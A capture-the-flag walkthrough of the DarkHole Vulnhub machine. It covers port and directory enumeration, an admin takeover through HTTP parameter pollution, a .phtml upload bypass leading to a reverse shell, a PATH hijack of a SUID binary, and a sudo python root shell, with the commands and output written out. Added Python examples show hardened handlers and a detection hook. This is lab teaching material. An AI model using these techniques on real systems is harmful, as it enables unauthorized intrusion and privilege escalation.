DarkHole Vulnhub Walkthrough
Creator: Je_1r.
Download Link: https://www.vulnhub.com/entry/darkhole-1,724/
Enumeration
I started the enumeration with an nmap scan to look for open ports and running services. You can also use rustscan for faster results, using the command shown below.
nmap -p- 192.168.29.246 -Pn
.
.
.
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Running nmap scripts to check the versions of the services and gather other useful information:
nmap -sC -sV -Pn -p22,80 192.168.29.246 -oN nmap.txt
.
.
.
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e4:50:d9:50:5d:91:30:50:e9:b5:7d:ca:b0:51:db:74 (RSA)
| 256 73:0c:76:86:60:63:06:00:21:c2:36:20:3b:99:c1:f7 (ECDSA)
|_ 256 54:53:4c:3f:4f:3a:26:f6:02:aa:9a:24:ea:1b:92:8c (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: DarkHole
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
I first enumerated the Apache httpd server on port 80, but there was nothing useful on the main page. Next I used ffuf for a directory brute-force attack using the command shown below:
ffuf -c -u "http://192.168.29.246/FUZZ" -e .php,.txt,.html,.bak -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -fc 404
.
.
.
index.php [Status: 200, Size: 810, Words: 347, Lines: 29]
login.php [Status: 200, Size: 2507, Words: 422, Lines: 50]
register.php [Status: 200, Size: 2886, Words: 512, Lines: 56]
upload [Status: 301, Size: 317, Words: 20, Lines: 10]
css [Status: 301, Size: 314, Words: 20, Lines: 10]
js [Status: 301, Size: 313, Words: 20, Lines: 10]
logout.php [Status: 302, Size: 0, Words: 1, Lines: 1]
config [Status: 301, Size: 317, Words: 20, Lines: 10]
dashboard.php [Status: 200, Size: 21, Words: 4, Lines: 1]
I found nothing useful in the directories, but login.php and register.php seemed interesting, so I tested the login form for SQL injection to bypass it; the SQL injection payloads didn't work.
After successful registration, I logged in and found a web page where users can update their information.
The GET parameter id looked suspicious to me, so I decided to capture the request and play with this parameter in Burp Suite (a handier way). I first tested for IDOR, but it did not work.
Next I intercepted the request while changing the password.
This time I tested for a parameter pollution attack, and the response was "200 OK", which means the password changed successfully. But for which user? The user with id 1 or the one with id 2?
I tried to log in using my old password and was able to log in. This means that the password was changed for the user with id 1 (maybe admin is the username).
I tried logging in as user admin with the password I had updated, and we were in!
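An added example (not code from the DarkHole box or this write-up) of the root cause behind that password change: a handler that trusts the request's id parameter, beside one that binds the update to the session user and requires the current password. The user table, hash helper and the assumption that the last duplicate id wins (as PHP's $_GET does) are constructed for the example.

```python
from typing import Dict, List
from urllib.parse import parse_qs
import hashlib


def _h(pw: str) -> str:
    # Constructed stand-in for a real password hash (use bcrypt or argon2 in practice).
    return hashlib.sha256(pw.encode()).hexdigest()


def fresh_db() -> Dict[int, dict]:
    # Constructed user table mirroring the write-up: id 1 is admin, id 2 is the self-registered user.
    return {
        1: {"username": "admin", "pw_hash": _h("admin-secret")},
        2: {"username": "tester", "pw_hash": _h("tester-old")},
    }


def vulnerable_change_password(query_string: str, db: dict) -> int:
    """Trusts the client-supplied id. With 'id=2&id=1' the last duplicate wins
    (PHP $_GET behaviour), so the update silently lands on user 1."""
    params = parse_qs(query_string)
    target = int(params["id"][-1])
    db[target]["pw_hash"] = _h(params["password"][-1])
    return target


def hardened_change_password(session_user_id: int, query_string: str, db: dict) -> int:
    """Updates only the authenticated session user; any id in the request is never read.
    Re-authenticating with the current password stops a hijacked session or CSRF
    from rotating the credential."""
    params = parse_qs(query_string)
    current = params.get("current_password", [""])[-1]
    new = params.get("password", [""])[-1]
    row = db[session_user_id]
    if _h(current) != row["pw_hash"]:
        raise PermissionError("current password does not match")
    if len(new) < 12:
        raise ValueError("new password too short")
    row["pw_hash"] = _h(new)
    return session_user_id


def foreign_ids(session_user_id: int, query_string: str) -> List[str]:
    """Detection hook: id values in the request that are not the session's own user.
    A non-empty result on a password-change request is worth logging and alerting on."""
    values = parse_qs(query_string).get("id", [])
    return [v for v in values if v != str(session_user_id)]
```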
File Upload Bypass
Now we have access to the admin panel, and it has upload functionality. So I tried uploading a file with a .php extension, but only .png, .jpg and .gif files were allowed.
To bypass this server-side check I simply renamed the shell.php script to shell.phtml and tried to upload the file again.
The file was uploaded successfully and was moved to the /upload/ directory. I started a netcat listener on the specified port on my machine and got a reverse shell.
❯ nc -nvlp 1234
listening on [any] 1234 ...
connect to [192.168.29.116] from (UNKNOWN) [192.168.29.246] 33038
Linux darkhole 5.4.0-77-generic #86-Ubuntu SMP Thu Jun 17 02:35:03 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
18:06:30 up 39 min, 0 users, load average: 0.04, 0.06, 0.25
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
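An added example (not the DarkHole application's code) of why the rename worked and how to close it: the write-up does not show the server's check, so this assumes it effectively behaved like a denylist on .php, and contrasts it with an allow-list on the final extension plus a magic-byte check and a server-generated filename. The signatures table and filenames are constructed for the example.

```python
import os
import secrets
from typing import Optional

# Magic bytes for the three formats the box claims to accept (constructed table).
ALLOWED = {"png": b"\x89PNG\r\n\x1a\n", "jpg": b"\xff\xd8\xff", "gif": b"GIF8"}
DENYLIST = {".php"}


def denylist_check(filename: str) -> bool:
    """The weak pattern: only .php is refused. Ubuntu's Apache PHP module config
    also maps .phtml to the PHP handler, so shell.phtml both passes and executes."""
    return os.path.splitext(filename)[1].lower() not in DENYLIST


def allowlist_check(filename: str, data: bytes) -> Optional[str]:
    """Returns a safe storage name when the upload really is an allowed image,
    otherwise None. Only the final extension counts, so cat.png.phtml is rejected."""
    base = os.path.basename(filename)
    ext = base.rsplit(".", 1)[-1].lower() if "." in base else ""
    if ext == "jpeg":
        ext = "jpg"
    if ext not in ALLOWED:
        return None
    if not data.startswith(ALLOWED[ext]):
        return None  # extension and content disagree: not the image it claims to be
    # Never keep the user's name: the stored path must not be attacker-chosen.
    return f"{secrets.token_hex(16)}.{ext}"
```

Pair this with an upload directory that Apache serves without any script handler (for example `php_admin_flag engine off` or a `FilesMatch` that denies `.ph*`), so a bypass of the check still cannot execute.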
User Shell
I started enumerating the box and found an interesting SUID binary using the command shown below:
find / -perm -u=s -type f 2>/dev/null
After running the toto binary, I found that it runs the id command in the background after setting the uid and gid to those of user john. To confirm this, I ran the strings command on the toto binary.
www-data@darkhole:/home/john$ ./toto
uid=1001(john) gid=33(www-data) groups=33(www-data)
www-data@darkhole:/home/john$ strings toto | head
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
system
__cxa_finalize
setgid
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
Next I opened this binary in Ghidra and, after analyzing it, found that it is vulnerable to a PATH misconfiguration: it relies on the PATH environment variable to locate id. We can take advantage of this by creating our own evil version of id to get a shell as user john.
www-data@darkhole:/tmp$ cat id
#!/bin/bash
bash
www-data@darkhole:/tmp$ chmod 777 id
www-data@darkhole:/tmp$ export PATH=/tmp:$PATH
www-data@darkhole:/tmp$ /home/john/toto
john@darkhole:/tmp$ whoami
john
Root Shell
Getting root was very simple. In john's home directory, I found a password file which contains the password of user john.
Next I ran sudo -l to check for sudo permissions and found this:
john@darkhole:/home/john$ cat password
ro******
john@darkhole:/home/john$ sudo -l
[sudo] password for john:
Matching Defaults entries for john on darkhole:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User john may run the following commands on darkhole:
(root) /usr/bin/python3 /home/john/file.py
As user john we can edit file.py, so by using the os module in Python I added code to pop a shell as user root!
john@darkhole:/home/john$ cat file.py
import os
os.system("/bin/bash")
john@darkhole:/home/john$ sudo -u root /usr/bin/python3 /home/john/file.py
root@darkhole:/home/john# cd /root
root@darkhole:~# cat root.txt
DarkHole{You_Are_Legend}
We are now root and have completed this challenge! For any queries you can PM me on Discord - golith3r00t#1859.
NOTE: The awesome artwork used in this article was created by Alex Pista.